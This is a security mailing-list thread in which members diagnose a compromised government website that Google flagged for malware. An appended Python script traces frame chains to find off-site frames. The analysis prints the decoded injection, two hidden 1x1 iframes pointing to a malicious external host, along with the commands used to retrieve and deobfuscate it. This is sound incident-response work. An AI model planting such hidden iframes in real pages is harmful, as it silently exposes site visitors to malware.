Thanks Adnan

On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor <[email protected]> wrote:
> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <[email protected]> wrote:
> > Syamsuri, nice to hear that. Can you share your blog address?
> >
> > Adnan, good work. Hope to learn more from you.
> >
> > On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote:
> >>
> >> Mr Adnan thanks for the info and guide..
> >>
> >> I have cleaned all the mess and the site is up and running again..
> >>
> >> thanks to all too..
> >>
> >> ** I will blog this so others can make it as a guide...
> >>
> >> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
> >>>
> >>> mamp <= LOL typo.. it should be nano
> >>> js <= one of the binaries in Spidermonkey. get the patched version
> >>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
> >>> working on MacOS/Darwin, apply this patch
> >>>
> >>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
> >>>
> >>> thanks
> >>>
> >>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan <[email protected]> wrote:
> >>> > I can see 2 interesting apps/scripts:
> >>> >
> >>> > 1. mamp
> >>> > 2. /opt/analysis/js/js
> >>> >
> >>> > care to share?
> >>> > hopefully it is open source ;)
> >>> >
> >>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
> >>> >>
> >>> >> Here is my bash history:
> >>> >>
> >>> >> xanda:tmp adnan$ history
> >>> >> <snip>
> >>> >> 500 cd /tmp
> >>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php
> >>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php
> >>> >> 503 nano indexsedc.php
> >>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php
> >>> >> 505 mamp indexsedc.php.1
> >>> >> 506 nano indexsedc.php.1
> >>> >> 507 wget http://www2.pkink.gov.my/sedc.php
> >>> >> 508 nano sedc.php
> >>> >> 509 wget http://www2.pkink.gov.my/default.php
> >>> >> 510 nano default.php
> >>> >> 511 nano default.php
> >>> >> 512 clear
> >>> >> <I've removed tags and left clean JavaScript inside>
> >>> >> 513 mv default.php default.txt
> >>> >> 514 /opt/analysis/js/js < default.txt
> >>> >> 515 cat write.log
> >>> >> 516 history
> >>> >> xanda:tmp adnan$
> >>> >>
> >>> >> Below is the output of the cat:
> >>> >> [output]
> >>> >> xanda:tmp adnan$ cat write.log
> >>> >> <iframe width="1" height="1"
> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
> >>> >> width="1" height="1"
> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
> >>> >> [/output]
> >>> >>
> >>> >> Hint: you might use a modified version of spidermonkey to 'understand'
> >>> >> the javascript
> >>> >>
> >>> >> Thanks
> >>> >>
> >>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote:
> >>> >> > thanks for the info..
> >>> >> > i will check all the files.
> >>> >> >
> >>> >> > how did you find it?
> >>> >> >
> >>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
> >>> >> >>
> >>> >> >> Here is the flow:
> >>> >> >>
> >>> >> >> 1) your indexsedc.php has an iframe to sedc.php
> >>> >> >> 2) and your sedc.php has an iframe to default.php
> >>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
> >>> >> >> actually create an iframe to
> >>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >>
> >>> >> >> thanks :)
> >>> >> >>
> >>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote:
> >>> >> >> > can you point...
> >>> >> >> > my index.htm or indexsedc.php or other file?
> >>> >> >> >
> >>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
> >>> >> >> >>
> >>> >> >> >> you have an iframe pointed to
> >>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >> >>
> >>> >> >> >> which is not xss :)
> >>> >> >> >>
> >>> >> >> >> From my personal point of view, it's either caused by:
> >>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
> >>> >> >> >> 2) compromised server
> >>> >> >> >>
> >>> >> >> >> you can send your access.log to [email protected] or
> >>> >> >> >> [email protected] for further analysis :)
> >>> >> >> >>
> >>> >> >> >> thanks
> >>> >> >> >>
> >>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote:
> >>> >> >> >> > I have checked it.
> >>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]> wrote:
> >>> >> >> >> >>
> >>> >> >> >> >> Hi Mohd Syamsuri,
> >>> >> >> >> >>
> >>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might help.
> >>> >> >> >> >>
> >>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
> >>> >> >> >> >>
> >>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
> >>> >> >> >> >>
> >>> >> >> >> >> Regards,
> >>> >> >> >> >> Kishur
> >>> >> >> >> >>
> >>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <[email protected]> wrote:
> >>> >> >> >> >>>
> >>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
> >>> >> >> >> >>> I need some advice.
> >>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
> >>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4 days.
> >>> >> >> >> >>> It said that we host malware on our server Malware Detected! (Google said that!!)
> >>> >> >> >> >>> What I did is..
> >>> >> >> >> >>> 1. Scan all the data and upload a new data
> >>> >> >> >> >>> 2. Check the index.html or index.php
> >>> >> >> >> >>> 3. Scan using web scanner using
> >>> >> >> >> >>> http://www.avgthreatlabs.com/
> >>> >> >> >> >>> http://www.virustotal.com
> >>> >> >> >> >>> but still get blocked..
> >>> >> >> >> >>> Google said Suspected injected code
> >>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
> >>> >> >> >> >>> NAME="confcontent"
> >>> >> >> >> >>> scrolling=yes
> >>> >> >> >> >>> I have been using this code for almost 2 years
> >>> >> >> >> >>> What should I do now?
> >>> >> >> >> >>>
> >>> >> >> >> >>> --
> >>> >> >> >> >>> best regard
> >>> >> >> >> >>> syamsuri
> >>> >> >> >> >>>
> >>> >> >> >> >>> _______________________________________________
> >>> >> >> >> >>> Owasp-Malaysia mailing list
> >>> >> >> >> >>> [email protected]
> >>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki
> >>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki Facebook
> >>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
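Added example (not part of the thread, and not code from any of its participants): a small Python tracer for the frame chain described in the quoted messages, following same-site frames page by page and reporting any frame that leaves the site. The host names, markup and `PLACEHOLDER` path are constructed; `script_output` stands for text captured from a page's script, such as the `write.log` shown in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FrameFinder(HTMLParser):
    """Collect the attributes of every <iframe>/<frame> tag that has a src."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("iframe", "frame") and attrs.get("src"):
            self.frames.append(attrs)

def is_hidden(attrs):
    # 0/1-pixel or CSS-hidden frames are not meant to be seen by the visitor.
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style

def trace_frames(start_url, static_pages, script_output=None):
    """Walk same-site frames breadth-first; return one finding per off-site frame.

    static_pages:  url -> markup as served (constructed here, wget output in practice)
    script_output: url -> markup the page's JavaScript wrote when executed
    """
    site = urlparse(start_url).hostname
    findings, seen, queue = [], set(), [(start_url, [start_url])]
    while queue:
        url, chain = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        finder = FrameFinder()
        finder.feed(static_pages.get(url, "") + (script_output or {}).get(url, ""))
        for attrs in finder.frames:
            target = urljoin(url, attrs["src"].strip())
            host = urlparse(target).hostname
            if host == site:
                queue.append((target, chain + [target]))
            elif (url, target) not in seen:  # the log repeats the same frame
                seen.add((url, target))
                findings.append({"chain": chain, "host": host, "hidden": is_hidden(attrs)})
    return findings

# Constructed sample mirroring the three-page flow; not the real site content.
BASE = "http://site.example/"
PAGES = {
    BASE + "indexsedc.php": '<html><iframe src="sedc.php"></iframe></html>',
    BASE + "sedc.php": '<iframe src="default.php"></iframe>',
    BASE + "default.php": "<script>/* obfuscated document.write(...) */</script>",
}
WRITTEN = {BASE + "default.php": '<iframe width="1" height="1" src="http://offsite.example/PLACEHOLDER"></iframe>"' * 2}
print(trace_frames(BASE + "indexsedc.php", PAGES, WRITTEN))
```

Run with the static pages alone, the tracer reports nothing, because the off-site frame only exists after the script in the last page has executed.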

